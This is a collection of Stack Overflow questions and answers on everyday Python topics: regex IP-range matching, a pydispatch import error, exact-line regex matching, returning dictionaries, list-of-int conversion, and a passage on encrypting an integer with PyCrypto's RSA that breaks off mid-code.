I can not figure out how to do this? I found [this](https://stackoverflow.com/questions/15525974/regex-to-match-an-ip-range) one done using Java. | You can use this:
```
re.compile(r"66\.249\.(?:6[4-9]|[78]\d|9[0-5])\.\d{1,3}$")
```
if you are motivated you can replace `\d{1,3}` by :
```
(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)
```
Explanation:
A regex engine doesn't know what a numeric range is. The only way to describe a range is to write all the possibilities with alternations:
```
6[4-9] | [78][0-9] | 9[0-5]
6 can be followed by 4 to 9 --> 64 to 69
7 or 8 can be followed by 0 to 9 --> 70 to 89
9 can be followed by 0 to 5 --> 90 to 95
``` | Use `socket.inet_aton`:
```
import socket
ip_min, ip_max = socket.inet_aton('66.249.64.0'), socket.inet_aton('66.249.95.255')
if ip_min <= socket.inet_aton('66.249.63.0') <= ip_max:
#do stuff here
``` | Python regex to match IP range | [
"",
"python",
"regex",
"ip",
""
] |
I have been attempting to follow a [**tutorial**](http://pyopengl.sourceforge.net/context/tutorials/shader_1.xhtml) online and I have followed every single line and for some reason I get the following error:
```
Traceback (most recent call last):
File "C:/Users/User/Desktop/OpenGLContextTest.py", line 2, in <module>
from OpenGLContext import testingcontext
File "C:\Python27\lib\site-packages\openglcontext-2.2.0a2-py2.7.egg\OpenGLContext\testingcontext.py", line 10, in <module>
from OpenGLContext import plugins, context, contextdefinition
File "C:\Python27\lib\site-packages\openglcontext-2.2.0a2-py2.7.egg\OpenGLContext\context.py", line 32, in <module>
from OpenGLContext import visitor, texturecache,plugins
File "C:\Python27\lib\site-packages\openglcontext-2.2.0a2-py2.7.egg\OpenGLContext\visitor.py", line 3, in <module>
from OpenGLContext.scenegraph import nodepath
File "C:\Python27\lib\site-packages\openglcontext-2.2.0a2-py2.7.egg\OpenGLContext\scenegraph\nodepath.py", line 3, in <module>
from vrml.vrml97 import nodepath, nodetypes
File "C:\Python27\lib\site-packages\pyvrml97-2.3.0a2-py2.7.egg\vrml\vrml97\nodepath.py", line 4, in <module>
from vrml import nodepath
File "C:\Python27\lib\site-packages\pyvrml97-2.3.0a2-py2.7.egg\vrml\nodepath.py", line 3, in <module>
from vrml import node, weaklist
File "C:\Python27\lib\site-packages\pyvrml97-2.3.0a2-py2.7.egg\vrml\node.py", line 6, in <module>
from vrml import field, fieldtypes, weaklist, weakkeydictfix
File "C:\Python27\lib\site-packages\pyvrml97-2.3.0a2-py2.7.egg\vrml\field.py", line 2, in <module>
from pydispatch import dispatcher, robustapply
ImportError: No module named pydispatch
```
I have attempted searching on google for the chance that this tutorial may be broken or something, but I don't believe it is. I have pydispatch and have attempted to install it using `easy_install` yet nothing changes. Can someone please help me with this? I know the code is completely correct as after a while I copied and pasted everything to ensure that it wasn't my syntax. | The instructions (apparently incorrectly) say to install `pydispatcher`. I had the same problem you did until I installed the module `PyDispatcher`. Confusingly, both exist. | To clarify on @Phil's answer.
I saw:
`No module named pydispatch`
And so I did:
`sudo pip install pydispatch`
The install worked, but Scrapy still didn't work because we were supposed to:
`sudo pip install pydispatcher` | No Module Named pydispatch when using pyOpenGL | [
"",
"python",
"pyopengl",
""
] |
I've a text file (say test.txt) e.g.
```
a ......
aa ......
a+a .....
aa+ .....
a+ .....
aaa .....
.........
```
Now I would like to find the line number of any particular strings e.g. 'a', 'aa+' etc. I've tried to find an exact match of the input string using regex.
```
name='a'
import re
p = re.compile(r'\b'+re.escape(name)+ r'\b')
i=0
with open('test.txt') as inpfile:
for num, line in enumerate(inpfile):
if p.search(line):
print num
```
The program should print "0" only but its printing 0,2,4.
My expected output is
```
name='a'
```
output: 0
```
name='aa'
```
output: 1
```
name='aa+'
```
output: 3 and so on...
I understood that the regular expression I used above, is not correct. But it will be helpful if you please share your comments/suggestions to compile the regular expression such a way that it gives the desired output for all the patterns.
Thanks. | Why would it *not* print 2 and 4? `a+a` and `a+` both contain `a` surrounded by word boundaries, exactly as you have specified with `\b`. Perhaps you want to match the start and end of the line instead? E.g.
```
name='a'
import re
p = re.compile('^'+re.escape(name)+ '$')
with open('test.txt') as inpfile:
for num, line in enumerate(inpfile):
if p.search(line.rstrip(r'\n')):
print num
```
But if you're looking to match the line exactly, why go to the trouble of using a regular expression?
```
name='a'
with open('test.txt') as inpfile:
for num, line in enumerate(inpfile):
if name == line.rstrip(r'\n'):
print num
``` | The problem is making exact sense of your regular expression. In lay terms, you are matching the expression:
"word border" followed by an 'a' followed by another "word border"
and that is why is matching lines 0 (a), 2 (a+a) and so on.
Here, spaces and non-printable characters (start of line, end of line) and '+' mark end of word | python regex with variable input | [
"",
"python",
"regex",
""
] |
I have a .txt file with the following lines in it:
```
23;Pablo;SanJose
45;Rose;Makati
```
I have this program:
```
file = open("C:/Users/renato/Desktop/HTML Files/myfile2.txt")
def query(id):
for line in file:
table = {}
(table["ID"],table["name"],table["city"]) = line.split(";")
if id == int(table["ID"]):
file.close()
return table
else:
file.close()
return {}
id = int(input("Enter the ID of the user: "))
table2 = query(id)
print("ID: "+table2["ID"])
print("Name: "+table2["name"])
print("City: "+table2["city"])
```
So what's happening (according to me) is:
File is opened
A hash called `table` is created and each line of the file is split into 3 keys/values.
If the `id` entered by the user matches the value of the key `ID`, then close the file
and return the whole hash.
Then, I'm assigning `table2` the values on the `table` hash and I'm trying to print the values in it.
When I run this, I get the following:
```
Traceback (most recent call last):
File "C:/Users/renato/Desktop/HTML Files/Python/hash2.py", line 17, in <module>
print("ID: "+table2["ID"])
KeyError: 'ID'
```
It seems like it's not recognizing the key `ID` on the `table2` var. I also tried declaring `table2` as a hash by putting `table2 = {}` before the function is executed, but it continues to display the error message.
How do I assign the values of a returned hash to a variable, so that I can print them using their `keys`? | What's going on is that you're returning right after the first line of the file doesn't match the id you're looking for. You have to do this:
```
def query(id):
for line in file:
table = {}
(table["ID"],table["name"],table["city"]) = line.split(";")
if id == int(table["ID"]):
file.close()
return table
# ID not found; close file and return empty dict
file.close()
return {}
``` | ```
def query(id):
for line in file:
table = line.split(";")
if id == int(table[0]):
yield table
id = int(input("Enter the ID of the user: "))
for id_, name, city in query(id):
print("ID: " + id_)
print("Name: " + name)
print("City: " + city)
file.close()
```
Using yield.. | How to return a dictionary | Python | [
"",
"python",
"python-3.x",
""
] |
I am new to Python. I need to know how to convert a list of integers to a list of strings. So,
```
>>>list=[1,2,3,4]
```
I want to convert that list to this:
```
>>>print (list)
['1','2','3','4']
```
Also, can I add a list of strings to make it look something like this?
```
1234
``` | You can use *List Comprehension*:
```
>>> my_list = [1, 2, 3, 4]
>>> [str(v) for v in my_list]
['1', '2', '3', '4']
```
or [*`map()`*](http://docs.python.org/2/library/functions.html#map):
```
>>> str_list = map(str, my_list)
>>> str_list
['1', '2', '3', '4']
```
In Python 3, you would need to use - `list(map(str, my_list))`
For 2nd part, you can use `join()`:
```
>>> ''.join(str_list)
'1234'
```
And please don't name your *list* `list`. It shadows the built-in `list`. | ```
>>>l=[1,2,3,4]
```
I've modified your example to not use the name `list` -- it shadows the actual builtin `list`, which will cause mysterious failures.
Here's how you make it into a list of strings:
```
l = [str(n) for n in l]
```
And here's how you make them all abut one another:
```
all_together = ''.join(l)
``` | Converting an integer list into a string list | [
"",
"python",
"python-3.3",
""
] |
I have a table with many integers in column named 'data'
```
data | param
123 1
432 1
123 1
423 2
234 1
423 2
```
I have a query
```
SELECT data FROM data_table WHERE param=*something* GROUP BY data
ORDER BY rand() LIMIT 1
```
That returns a random distinct integer from the table. But I also need to get the total number of integers that I was choosing from. I tried:
```
SELECT DISTINCT(data) AS data, COUNT(DISTINCT(data)) as count FROM
data_table WHERE param=*something* ORDER BY rand() LIMIT 1
```
This returns correct number from which data was chosen, but the *data* returned is no random - it is always the same row. So I need to get number of rows that rand() were selected after WHERE was applied. So making a query on above table should return:
```
query WHERE param='1':
data count
123 3
query WHERE param='1':
data count
432 3
query WHERE param='1':
data count
234 3
query WHERE param='2':
data count
423 1
``` | This works. I normally don't recommend putting a query in the selector because it evaluates for each row returned. However in this case you are only returning one row so it is OK.
```
select
count(distinct data) as cnt,
(SELECT data FROM data_table GROUP BY data
WHERE param='xxx'
ORDER BY rand() LIMIT 1) as random
from data_table
WHERE param='xxx'
```
See this [SQL Fiddle](http://www.sqlfiddle.com/#!2/d0fa0/6) to see it work without the where statements. | I think the easiest is to join another select statement to get the total number of rows and add that to your main SELECT statement.
```
SELECT data AS data, count.count
FROM data
JOIN (SELECT COUNT(DISTINCT(data)) AS count FROM data WHERE parameter = "test") AS count
WHERE parameter = "test"
ORDER BY rand()
LIMIT 1;
```
[Here's a SQL Fiddle](http://sqlfiddle.com/#!2/58dab/1) | Count distinct elements and return only one | [
"",
"mysql",
"sql",
""
] |
My requirement to compare two table data with in one database and stored the uncommon data in separate table named relation data within same database.
How to compare this tables data?
To compare is their any tools and can we stored uncommon data in separately table using any tool?
i forgot to tell one thing that two tables having same data but different column names that means for example first table having 20 columns and 2 and table having 50 columns but in that 4 columns are matched data with different number of rows and different column names in each table.based on these columns data matching i need to find rows and stored into another table | Try this query, I think its work
```
insert into relational(r1,r2,r3,....rn)
(select s1,s2,s3,...sn from
information info where info.informationcity not in (select customercity from customer)
and info.informationstate not in (select customerstate from customer) )
``` | As an alternative to writing a SQL script, you could copy the entire results from both tables to a .csv file and then use win merge to compare the two:
<http://winmerge.org/downloads/>
I have used this technique in the past when comparing mass amounts of data and it has worked quite well. | Compare data between two tables with in single database | [
"",
"sql",
"sql-server",
"sql-server-2008",
""
] |
I am trying to add sorting feature of my pagination stored procedure.
How can I do this, so far I created this one. It works fine but when pass the `@sort` parameter, it didn't work.
```
ALTER PROCEDURE [dbo].[sp_Mk]
@page INT,
@size INT,
@sort nvarchar(50) ,
@totalrow INT OUTPUT
AS
BEGIN
DECLARE @offset INT
DECLARE @newsize INT
IF(@page=0)
begin
SET @offset = @page;
SET @newsize = @size
end
ELSE
begin
SET @offset = @page+1;
SET @newsize = @size-1
end
-- SET NOCOUNT ON added to prevent extra result sets from
SET NOCOUNT ON;
WITH OrderedSet AS
(
SELECT *,
ROW_NUMBER() OVER (ORDER BY @sort DESC) AS 'Index'
FROM [dbo].[Mk]
)
SELECT *
FROM OrderedSet
WHERE [Index] BETWEEN @offset AND (@offset + @newsize)
SET @totalrow = (SELECT COUNT(*) FROM [dbo].[Mk])
END
``` | One way (possibly not the best) to do it is to use dynamic SQL
```
CREATE PROCEDURE [sp_Mk]
@page INT,
@size INT,
@sort nvarchar(50) ,
@totalrow INT OUTPUT
AS
BEGIN
DECLARE @offset INT
DECLARE @newsize INT
DECLARE @sql NVARCHAR(MAX)
IF(@page=0)
BEGIN
SET @offset = @page
SET @newsize = @size
END
ELSE
BEGIN
SET @offset = @page*@size
SET @newsize = @size-1
END
SET NOCOUNT ON
SET @sql = '
WITH OrderedSet AS
(
SELECT *, ROW_NUMBER() OVER (ORDER BY ' + @sort + ') AS ''Index''
FROM [dbo].[Mk]
)
SELECT * FROM OrderedSet WHERE [Index] BETWEEN ' + CONVERT(NVARCHAR(12), @offset) + ' AND ' + CONVERT(NVARCHAR(12), (@offset + @newsize))
EXECUTE (@sql)
SET @totalrow = (SELECT COUNT(*) FROM [Mk])
END
```
Here is **[SQLFiddle](http://sqlfiddle.com/#!3/6b4a0/4)** demo | I'm adding an answer since so many of the other answers suggest dynamic SQL, which is not a best practice. You can add pagination using an `OFFSET-FETCH` clause, which provides you with an option to fetch only a window or page of results from a result set.
**Note**: `OFFSET-FETCH` can be used only with the `ORDER BY` clause.
Example:
```
SELECT First Name + ' ' + Last Name FROM Employees
ORDER BY First Name
OFFSET 10 ROWS FETCH NEXT 5 ROWS ONLY;
```
If you put it in a stored procedure
```
CREATE PROCEDURE [dbo].[uspEmployees_GetAll]
@rowOffset int = 0,
@fetchNextRows int = 100
AS
BEGIN
SELECT * FROM Employees
ORDER BY ID desc
OFFSET @rowOffset ROWS FETCH NEXT @fetchNextRows ROWS ONLY;
END
```
You can call it like this
```
DECLARE @rowOffset int
DECLARE @fetchNextRows int
EXECUTE [dbo].[uspEmployees_GetAll]
@rowOffset = 0,
@fetchNextRows = 30
``` | Pagination with the stored procedure | [
"",
"sql",
"sql-server",
"t-sql",
"stored-procedures",
""
] |
I have a `x,y` distribution of points for which I obtain the `KDE` through [scipy.stats.gaussian\_kde](http://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.gaussian_kde.html). This is my code and how the output looks (the `x,y` data can be obtained from [here](http://pastebin.com/RXbHzGfV)):
```
import numpy as np
from scipy import stats
# Obtain data from file.
data = np.loadtxt('data.dat', unpack=True)
m1, m2 = data[0], data[1]
xmin, xmax = min(m1), max(m1)
ymin, ymax = min(m2), max(m2)
# Perform a kernel density estimate (KDE) on the data
x, y = np.mgrid[xmin:xmax:100j, ymin:ymax:100j]
positions = np.vstack([x.ravel(), y.ravel()])
values = np.vstack([m1, m2])
kernel = stats.gaussian_kde(values)
f = np.reshape(kernel(positions).T, x.shape)
# Define the number that will determine the integration limits
x1, y1 = 2.5, 1.5
# Perform integration?
# Plot the results:
import matplotlib.pyplot as plt
# Set limits
plt.xlim(xmin,xmax)
plt.ylim(ymin,ymax)
# KDE density plot
plt.imshow(np.rot90(f), cmap=plt.cm.gist_earth_r, extent=[xmin, xmax, ymin, ymax])
# Draw contour lines
cset = plt.contour(x,y,f)
plt.clabel(cset, inline=1, fontsize=10)
plt.colorbar()
# Plot point
plt.scatter(x1, y1, c='r', s=35)
plt.show()
```

The red point with coordinates `(x1, y1)` has (like every point in the 2D plot) an associated value given by `f` (the kernel or `KDE`) between 0 and 0.42. Let's say that `f(x1, y1) = 0.08`.
I need to integrate `f` with integration limits in `x` and `y` given by those regions where `f` evaluates to *less* than `f(x1, y1)`, ie: `f(x, y)<0.08`.
For what I've seen `python` can perform integration of *functions* and one dimensional arrays through numerical integration, but I haven't seen anything that would let me perform a numerical integration on a 2D array (the `f` kernel) Furthermore, I'm not sure how I would even recognize the regions given by that particular condition (ie: `f(x, y)`less than a given value)
Can this be done at all? | Here is a way to do it using monte carlo integration. It is a little slow, and there is randomness in the solution. The error is inversely proportional to the square root of the sample size, while the running time is directly proportional to the sample size (where sample size refers to the monte carlo sample (10000 in my example below), not the size of your data set). Here is some simple code using your `kernel` object.
```
#Compute the point below which to integrate
iso = kernel((x1,y1))
#Sample from your KDE distribution
sample = kernel.resample(size=10000)
#Filter the sample
insample = kernel(sample) < iso
#The integral you want is equivalent to the probability of drawing a point
#that gets through the filter
integral = insample.sum() / float(insample.shape[0])
print integral
```
I get approximately 0.2 as the answer for your data set. | Currently, it is available
`kernel.integrate_box([-np.inf,-np.inf], [2.5,1.5])` | Integrate 2D kernel density estimate | [
"",
"python",
"integration",
"kernel-density",
"probability-density",
""
] |
I have two CheckButtons widgets with 3 elements each. I'd like to read the status of both widgets when either one of the CheckButtons is selected then update the chart accordingly.
The slider widget has a `.val` for returning the status of a slider, but the CheckButtons widget seems a bit more awkward (or am I missing something obvious)?
short example:
```
import matplotlib.pyplot as plt
from matplotlib.widgets import CheckButtons
class Example:
def updateChart(self, event):
colour = self.colours.labels # gets labes as text object, is there an easy way of getting the status?
print colour
# measurement = measurements.something
def __init__(self):
colourax = plt.axes([0.5, 0.4, 0.09, 0.2])
measurementax = plt.axes([0.5, 0.6, 0.09, 0.2])
self.colours = CheckButtons(colourax, ('Red', 'Green', 'Blue'), (False, False, False))
self.measurements = CheckButtons(measurementax, ('1', '2', '3'), (False, False, False))
self.colours.on_clicked(self.updateChart)
self.measurements.on_clicked(self.updateChart)
def run(self):
plt.show()
ex = Example()
ex.run()
``` | There might perhaps be a more elegant way but you can always keep track of the states of each of the checkboxes yourself, e.g. in a `dict`. The function that you specify using `on_clicked()` will receive the label string of the active checkbox as its second argument, which you can then use to update the status appropriately:
```
import matplotlib.pyplot as plt
from matplotlib.widgets import CheckButtons
class Example:
def onColor(self,label):
self.cstates[label] = not self.cstates[label]
print 'un'*(not self.cstates[label]) + 'checked %s' %label
self.updateChart()
def onMeasurement(self,label):
self.mstates[label] = not self.mstates[label]
print 'un'*(not self.mstates[label]) + 'checked %s' %label
self.updateChart()
def updateChart(self, event=None):
"""do something here using self.cstates and self.mstates?"""
pass
def __init__(self):
colourax = plt.axes([0.5, 0.4, 0.09, 0.2])
measurementax = plt.axes([0.5, 0.6, 0.09, 0.2])
clabels, cvals = ('Red', 'Green', 'Blue'), (False,)*3
mlabels, mvals = ('1', '2', '3'), (False,)*3
self.cstates = dict(zip(clabels,cvals))
self.mstates = dict(zip(mlabels,mvals))
self.colours = CheckButtons(colourax, clabels, cvals)
self.colours.on_clicked(self.onColor)
self.measurements = CheckButtons(measurementax, mlabels, mvals)
self.measurements.on_clicked(self.onMeasurement)
def run(self):
plt.show()
ex = Example()
ex.run()
```
Not the prettiest, but it works! | I know it's a bit awkward, but you can check for visibility of on of the cross lines in check boxes.
```
import matplotlib.pyplot as plt
from matplotlib.widgets import CheckButtons
colourax = plt.axes([0.5, 0.4, 0.09, 0.2])
colours = CheckButtons(colourax, ('Red', 'Green', 'Blue'), (False, False, False))
isRedChecked = colours.lines[0][0].get_visible()
isGreenChecked = colours.lines[1][0].get_visible()
isBlueChecked = colours.lines[2][0].get_visible()
``` | Retrieving the selected values from a CheckButtons object in matplotlib | [
"",
"python",
"matplotlib",
""
] |
I'm struggling to access a streaming API using Python and Requests.
What the API says: "We’ve enabled a streaming endpoint to for requesting both quote and trade data utilizing a persistent HTTP socket connection. Streaming data from the API consists of making an Authenticated HTTP request and leaving the HTTP socket open to continually receive data."
How I've been trying to access the data:
```
s = requests.Session()
def streaming(symbols):
url = 'https://stream.tradeking.com/v1/market/quotes.json'
payload = {'symbols': ','.join(symbols)}
return s.get(url, params=payload, stream=True)
r = streaming(['AAPL', 'GOOG'])
```
The Requests docs [here](https://requests.readthedocs.io/en/latest/user/advanced/) show two things of interest: Use a generator/iterator for use with chunked data, passed in the data field. For streaming data, it suggests using code such as:
```
for line in r.iter_lines():
print(line)
```
Neither seem to work, although I've no idea what to put in the generator function, since the example is unclear. Using r.iter\_lines(), I get the output: "b'{"status":"connected"}{"status":disconnected"}'"
I can access the headers, and the response is HTTP 200, but can't get valid data, or find clear examples on how to access streaming HTTP data in python. Any help would be appreciated. The API recommends using Jetty for Java to keep the stream open, but I'm not sure how to do this in Python.
Headers: {'connection': 'keep-alive', 'content-type': 'application/json', 'x-powered-by': 'Express', 'transfer-encoding': 'chunked'} | Not sure if you figured this out, but TradeKing doesn't put newlines in between their JSON blobs. You thus have to use iter\_content to get it byte by byte, append that byte to a buffer, try to decode the buffer, on success clear the buffer and yield the resultant object. :( | As verbsintransit has stated, you need to solve your authentication problems, your streaming problems however can be fixed by using this example:
```
s = requests.Session()
def streaming(symbols):
payload = {'symbols': ','.join(symbols)}
headers = {'connection': 'keep-alive', 'content-type': 'application/json', 'x-powered-by': 'Express', 'transfer-encoding': 'chunked'}
req = requests.Request("GET",'https://stream.tradeking.com/v1/market/quotes.json',
headers=headers,
params=payload).prepare()
resp = s.send(req, stream=True)
for line in resp.iter_lines():
if line:
yield line
def read_stream():
for line in streaming(['AAPL', 'GOOG']):
print line
read_stream()
```
The `if line:` condition is checking if the `line` is an actual message or just a connection keep-alive. | Understanding Python HTTP streaming | [
"",
"python",
"http",
"streaming",
"python-requests",
"chunked-encoding",
""
] |
[This question](https://stackoverflow.com/questions/1312101/how-to-find-a-gap-in-running-counter-with-sql) explains how to find the first "unused" number in a table, but how can I find the same so that I can define extra constraints. How do I alter the query so that I get the first unused number after that's greater than 100
e.g. If I have 23, 56, 100, 101, 103 in my table i should get 102. | in mysql and postgresql
```
SELECT id + 1
FROM test mo
WHERE NOT EXISTS
(
SELECT NULL
FROM test mi
WHERE mi.id = mo.id + 1
) and mo.id> 100
ORDER BY
id
LIMIT 1
```
[fiddle for mysql](http://www.sqlfiddle.com/#!2/43771/6) and [fiddle for postgresql](http://www.sqlfiddle.com/#!1/43771/1)
in ms sql
```
SELECT TOP 1
id + 1
FROM test mo
WHERE NOT EXISTS
(
SELECT NULL
FROM test mi
WHERE mi.id = mo.id + 1
)
and mo.id > 100
ORDER BY
id
```
[fiddle](http://www.sqlfiddle.com/#!3/43771/1) | In Oracle Sql, you may try:
```
SELECT id
FROM
(SELECT ID, lead(ID) OVER(ORDER BY ID) next_val FROM my_table t
)
WHERE id +1 <> next_val
AND id >100;
``` | How to find a gap in range in SQL | [
"",
"sql",
"sqlite",
"postgresql",
"gaps-and-islands",
""
] |
I have a pandas dataframe and would like to plot values from one column versus the values from another column. Fortunately, there is `plot` method associated with the dataframes that seems to do what I need:
```
df.plot(x='col_name_1', y='col_name_2')
```
Unfortunately, it looks like among the plot styles (listed [here](http://pandas.pydata.org/pandas-docs/dev/generated/pandas.DataFrame.plot.html) after the `kind` parameter), there are not points. I can use lines or bars or even density but not points. Is there a work around that can help to solve this problem? | You can specify the `style` of the plotted line when calling [`df.plot`](http://pandas.pydata.org/pandas-docs/version/0.15.0/generated/pandas.DataFrame.plot.html?highlight=plot#pandas-dataframe-plot):
```
df.plot(x='col_name_1', y='col_name_2', style='o')
```
The `style` argument can also be a `dict` or `list`, e.g.:
```
import numpy as np
import pandas as pd
d = {'one' : np.random.rand(10),
'two' : np.random.rand(10)}
df = pd.DataFrame(d)
df.plot(style=['o','rx'])
```
All the accepted style formats are listed in the documentation of [`matplotlib.pyplot.plot`](http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.plot).
 | For this (and most plotting) I would not rely on the Pandas wrappers to matplotlib. Instead, just use matplotlib directly:
```
import matplotlib.pyplot as plt
plt.scatter(df['col_name_1'], df['col_name_2'])
plt.show() # Depending on whether you use IPython or interactive mode, etc.
```
and remember that you can access a NumPy array of the column's values with `df.col_name_1.values` for example.
I ran into trouble using this with Pandas default plotting in the case of a column of Timestamp values with millisecond precision. In trying to convert the objects to `datetime64` type, I also discovered a nasty issue: < [Pandas gives incorrect result when asking if Timestamp column values have attr astype](https://stackoverflow.com/questions/26350364/pandas-gives-incorrect-result-when-asking-if-timestamp-column-values-have-attr-a) >. | How to plot two columns of a pandas data frame using points | [
"",
"python",
"pandas",
"dataframe",
"matplotlib",
"scatter-plot",
""
] |
I have a link like this `<a href=abc.asp?xyz=foobar&baz=lookatme´_beautiful.jpg>` , where there is this unusual symbol `´` , which is not even present in a standard English keyboard.
It is the mirror reflection of the symbol that `Ctrl+k` produces in this editor .
So after I ran this code found on stackoverflow:
```
soup = BeautifulSoup.BeautifulSoup("<a href=abc.asp?xyz=foobar&baz=lookatme´_beautiful.jpg>");
for a in soup.findAll('a'):
print a['href']
```
The output is `abc.asp?xyz=foobar&baz=lookatme` but I want to have `abc.asp?xyz=foobar&baz=lookatme´_beautiful.jpg` . The website that I'm scraping is in a `.br` domain . Some of the writings is in Portugese , even though the links are in English , but that uncommon symbol may not be a valid English language symbol. Any thoughts or suggestions ?
Edit: I looked at the representation that Python string produced me , it was `<a href=abc.asp?xyz=foobar&baz=lookatme\xb4_beautiful.jpg>`
One way around is to produce custom regex , and this snippet is also from stackoverflow:
```
import re
urls = re.findall(r'href=[\'"]?([^\'" >]+)', s)
```
If it is impossible to modify beautifulsoup regex , how can I modify the above regex to incorporate the `\xb4` symbol. ( s here is the string in question ) | Upgrade to the latest version of BeautifulSoup and install `html5lib`, which is a very lenient parser:
```
import requests
from bs4 import BeautifulSoup
html = requests.get('http://www.atlasdermatologico.com.br/listar.asp?acao=indice').text
soup = BeautifulSoup(html, 'html5lib')
for a in soup.find_all('a'):
href = a.get('href')
if '\\' in repr(href):
print(repr(href))
```
It correctly prints out the links with `\xb4` in the URL. | You can include **[\u0000-\uFFFF]** as a subrange in re pattern or only include \xb4 as **[\u00b4]** | Parsing uncommon symbol using BeautifulSoup | [
"",
"python",
"regex",
"beautifulsoup",
""
] |
Say that I have 2 tables, one with entries of films that an user likes and an other with events that an user has gone. Each table has a column for knowing the user. Something like:
Table Films:
```
id | iduser | film | number of watches | note ....
```
Table events:
```
id | iduser | event | date | ....
```
both iduser are connected with a relation to a table with other information of the user.
If I want to select some columns from table films and others from table events with the same iduser, is there a better way than 2 SELECT? I say this because each select has diferent number of rows so UNION gives me an error and join gives me like:
**EDIT**
```
FILM | NOTE | EVENT | DATE
-----------------------------------------
tlor | 9 | going to park | 20/7/12
tlor | 9 | eat a sandwich | 5/9/10
B film | 7 | going to park | 20/7/12
B film | 7 | eat a sandwich | 5/9/10
```
**EDIT 2**
I say only a select because I think is the faster way but if there's a faster way, please let me know it. | If you for some reason need to fetch your data in using exactly one SELECT you can unify your resultsets for `UNION ALL` like this
```
SELECT 'film' type, iduser, film name, watches, note, NULL date
FROM films
WHERE iduser = ?
UNION ALL
SELECT 'event' type, iduser, event name, NULL, NULL, date
FROM events
WHERE iduser = ?
```
Another approach to grab all data in one go is to pack column values specific to particular table with [`GROUP_CONCAT`](http://dev.mysql.com/doc/refman/5.0/en/group-by-functions.html#function_group-concat) into a `details` column and then [`explode`](http://php.net/manual/en/function.explode.php) it in client code
```
SELECT 'film' type, iduser, film name, GROUP_CONCAT(CONCAT_WS('|', watches, note)) details
FROM films
WHERE iduser = 1
GROUP BY iduser, film
UNION ALL
SELECT 'event' type, iduser, event name, GROUP_CONCAT(CONCAT_WS('|', date))
FROM events
WHERE iduser = 1
GROUP BY iduser, event
```
Here is **[SQLFiddle](http://sqlfiddle.com/#!2/e69c1/5)** demo | Doing two SELECTs is the correct solution here. You're loading two different sets of data.
**IF** the two tables had similar schemas (e.g, same column names and types), you could combine the two using:
```
SELECT * FROM table1 WHERE userid = ? UNION SELECT * FROM table2 WHERE userid = ?
```
However, this **will not** work sensibly with two tables with different schemas. | Is there a better way than using 2 SELECT? | [
"",
"mysql",
"sql",
""
] |
I'm using SQL Server 2008 RD.
I've got the following table say `myTable` consisting of a number of columns. `AccID` and `AccName` are the columns in which I'm interested in and non of them is a primary-key. So I want to obtain all the records having at least a duplicate (there could be more than 2 rows agreeing on `AccID` and `AccName`).
```
AccID AccName
1 333 SomeName1
2 333 SomeName1
3 444 SomeName2
4 444 SomeName2
5 444 SomeName2
```
How can I do this with SQL? | Try this way:
```
select m1.AccID, m1.AccName
from myTable m1
join ( select AccID,AccName
from myTable
group by AccID,AccName
having count(1) = 2
) m2 on m1.AccID = m2.AccID
and m1.AccName = m2.AccName
``` | Use GROUP BY clause and COUNT aggregate function with condition specified by
```
HAVING COUNT(*) > 1
``` | SQL: Find records with matching values on a set of columns | [
"",
"sql",
"sql-server-2008",
""
] |
THIS IS MY TABLE STRUCTURE:
```
Anees 1000.00
Rick 1200.00
John 1100.00
Stephen 1300.00
Maria 1400.00
```
I am trying to find the MAX(salary) and the persons name .
this is the query I use
Select MAX(salary),emp\_name
FROM emp1
I get `1400.00 and Anees.`
While the 1400 is correct the Anees is wrong,it should be maria. What changes do I need to make | Gordon gave an explanation why and the simplest way to get want you want. But if you for some reason want to use `MAX()` you can do it like this
```
SELECT emp_name, salary
FROM emp1
WHERE salary =
(
SELECT MAX(salary) salary
FROM emp1
)
```
Output:
```
| EMP_NAME | SALARY |
---------------------
| Maria | 1400 |
```
Here is **[SQLFiddle](http://sqlfiddle.com/#!2/7f5e4/3)** demo | MySQL allows you to have columns in the `select` statement that are not in aggregate functions and are not in the `group by` clause. Arbitrary values are returned.
The easiest way to do what you want is:
```
select t.*
from t
order by salary desc
limit 1;
``` | SQL max() function returns wrong value for row with maximum value | [
"",
"mysql",
"sql",
"max",
""
] |
I am trying to encrypt an integer using RSA.
I observed that I can encrypt a string but cannot encrypt an Integer.
here are the relevant code snippets:
Could not encrypt the integer, 4:
```
crypto:~$ python
Python 2.7.3 (default, Aug 1 2012, 05:14:39)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from Crypto.PublicKey import RSA
>>> input=4
>>> rsa=RSA.generate(1024)
>>> print rsa.encrypt(input,"")[0].encode('hex')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/usr/lib/python2.7/dist-packages/Crypto/PublicKey/pubkey.py", line 64, in encrypt
ciphertext=self._encrypt(plaintext, K)
File "/usr/lib/python2.7/dist-packages/Crypto/PublicKey/RSA.py", line 71, in _encrypt
return (self.key._encrypt(c),)
TypeError: must be long, not int
>>>
```
Now, I represent that number as a hex string, it works:
```
crypto:~$ python
Python 2.7.3 (default, Aug 1 2012, 05:14:39)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from Crypto.PublicKey import RSA
>>> input='\x04'
>>> rsa=RSA.generate(1024)
>>> print rsa.encrypt(input,"")[0].encode('hex')
09f7d33972b0b6b72136f8aef0c8ba4446afad0dcf65337cd8b6c48c3758f5455e19e9c1ecbd058d7f83bcaa1f860b1ea0197d83f91fa958e6c9a2664a7ebee77c41fbfc4d3960e98afc0d94d1af8a230c4d86fce53f4c7ac72ae40a8acb101b40de6d46fe8e3cb7265f253b410a95a255e5fad0d0438d1fc62ad1feb96d331f
```
Using the inspect module I checked the source code of the encrypt function of RSA object and it says it can encrypt both a string or an integer plaintext:
```
crypto:~$ python
Python 2.7.3 (default, Aug 1 2012, 05:14:39)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import inspect
>>> from Crypto.PublicKey import RSA
>>> rsa=RSA.generate(1024)
>>> rsa
<_RSAobj @0x29c1368 n(1024),e,d,p,q,u,private>
>>> print inspect.getsource(rsa.encrypt)
def encrypt(self, plaintext, K):
"""encrypt(plaintext:string|long, K:string|long) : tuple
Encrypt the string or integer plaintext. K is a random
parameter required by some algorithms.
"""
wasString=0
if isinstance(plaintext, types.StringType):
plaintext=bytes_to_long(plaintext) ; wasString=1
if isinstance(K, types.StringType):
K=bytes_to_long(K)
ciphertext=self._encrypt(plaintext, K)
